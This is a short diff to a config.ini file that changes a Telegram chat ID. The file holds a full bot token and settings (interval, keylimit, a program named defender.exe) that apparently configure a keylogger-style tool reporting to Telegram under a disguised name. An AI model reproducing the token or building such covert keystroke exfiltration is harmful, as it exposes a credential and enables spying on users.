--- a/config.ini
+++ b/config.ini
@@ -1,6 +1,6 @@
 [main]
 token=5023865420:AAEMazUzGdgPnVJXzeOeyLFKUnS36FC6mik
-chatid=1733877952
+chatid=-1001733877952
 interval=300
 keylimit=500
 program=defender.exe
